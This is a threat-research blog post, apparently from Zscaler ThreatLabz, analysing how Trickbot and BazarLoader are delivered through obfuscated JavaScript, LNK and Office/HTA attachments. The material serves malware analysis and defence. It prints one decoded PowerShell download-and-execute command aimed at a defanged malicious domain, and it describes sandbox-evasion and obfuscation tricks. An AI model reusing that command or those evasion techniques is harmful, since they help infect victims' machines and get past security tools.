New Trickbot and BazarLoader delivery vectors

New Trickbot and BazarLoader delivery vectors

The  Zscaler ThreatLabz research team monitors thousands of files daily tracking new and pervasive threats, including one of the most prominent banking trojans of the last five years: Trickbot. Trickbot has been active since 2016 and is linked to a large number of malicious campaigns involving bitcoin mining and theft of banking information, personal identifying information (PII), and credentials. BazarLoader is a spinoff of this trojan, developed by the same authors. Both are particularly dangerous as they are easily modifiable and capable of delivering multi-stage payloads, as well as taking over computers entirely.

ThreatLabz has discovered Trickbot operators using new approaches to delivering payloads in recent attack campaigns. The malware samples we analyzed were well-crafted and highly obfuscated with sandbox-evading capabilities. In this blog post, we will show analysis of the different delivery vectors used by Trickbot and BazarLoader.

Key Points:

1. Script and LNK files added evasion techniques to leverage Malware threats.

2. Multilayer obfuscation is used to preclude analysis of JS and LNK files.

3. An Office attachment drops an HTA file with snippets of HTML and javascript functions.

4. Newly registered domains are used to deliver threats.

Trickbot is expanding its range of file types for malware delivery

In previous campaigns, Trickbot payloads were generally dropped as malicious attachments to Microsoft Office files. In the last month, we’ve seen that malware has also used javascript files at a high volume, along with a range of other file formats, as shown in the following charts:

Fig1:Trickbot blocked in the Zscaler Cloud Sandbox

Fig2:BazarLoader blocked in the Zscaler Cloud Sandbox

In this blog, we’ll walk through the attack chain for multiple delivery vectors, including: 

Trickbot spreading through scripting files

Trickbot gains intrusion using spam emails bundled with malicious javascript attachments, such as the following:  

Fig3:Spam email attachment

In this case, the Javascript [5B606A5495A55F2BD8559778A620F21B] file has three layers of obfuscation that are mostly used to evade and bypass sandbox environments. Below is the snapshot of the first obfuscated layer:

Fig4:First layer of obfuscation in javascript

In addition to taking extreme effort to make javascript files highly obfuscated, the malware authors have also added large amounts of junk code to the end to make debugging more difficult. The junk code is just random generated obfuscated strings that do not play any role with the malicious code.

Fig5:Junk code to make analysis difficult

Using the eval() function we have de-obfuscated the second layer in which malicious code is embedded with more junk code. After removing this layer of junk code, the eval() function is used once again to retrieve the final layer of code. We can see that the Trickbot authors used the setTimeout() method, which evaluates an expression after a 967 milliseconds to delay execution in the sandbox. This helps the malware evade sandbox environments.

Fig6: Second layer of obfuscation in javascript

In the above snapshot we are able to see the replace method implemented in the code where “”hdBDJ” and “tSJVh” strings are removed from the variables “YHPhEFtKjqbCmAZ” and “kVYJOrLSqvdAWnaGTX” respectively to get the final string.

Fig7:Final layer

The malicious Javascript executes cmd.exe as a child process, then cmd.exe executes powershell.exe to download Trickbot as payload. 

Flow of execution: 

Wscript.exe ->cmd.exe->powershell.exe

Powershell.exe embedded with base64 encoded command and after decoded following command is:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php”)

Fig8:Zscaler Cloud Sandbox detection of Javascript Downloader

Trickbot spreading through LNK files

Windows LNK (LNK) extensions are usually seen by users as shortcuts, and we have frequently observed cybercriminals using LNK files to download malicious files such as Trickbot. Trickbot hides the code in the argument section under the properties section of the LNK file. The malware author added extra spaces in between the malicious code to attempt to make it more difficult for researchers to debug the code. We’ve seen this technique used previously in the Emotet campaign using malicious Office attachments in 2018.

Fig9:Code embedded in the properties section of LNK

Downloading Trickbot :

Fig10:Zscaler Cloud Sandbox detection of LNK Downloader

BazarLoader spreading through Office attachments

This is one of the other techniques used in TA551 APT aka Shathak. Malicious office documents drop the HTA file to “C\ProgramData\sda.HTA”. This HTA file contains HTML and vbscript designed to retrieve a malicious DLL to infect a vulnerable Windows host with BazarLoader. 

Once macro-enabled, the mshta.exe process executes to download a payload. This campaign has been observed delivering BazarLoader and Trickbot in the past.

Fig11:Attack chain of DOC file to download BazarLoader

Base64 encoded data is implemented in the HTML <div> tag which is used later with javascript.

Fig12:Dropped HTA file : Malicious base64 encoded under HTML <div> section

Below is the snapshot of decode base64 data in which we can see it downloading the payload and saving as friendIFriend,jpg to the victim machine:

Fig13:Dropped HTA file : Decode Base64 data

Networking : C&C to download BazarLoader

Fig14:Sending request to download BazarLoader

We have also observed newly registered domains (NRDs) specifically created to distribute these payloads, using a stealer delivered through spam email and bundled with a malicious Microsoft Office attachment.

Fig15: Newly registered domain

Fig16:Zscaler Cloud Sandbox detection of Malicious Office file Downloader

This content was originally published here.

Laat een reactie achter

Het e-mailadres wordt niet gepubliceerd.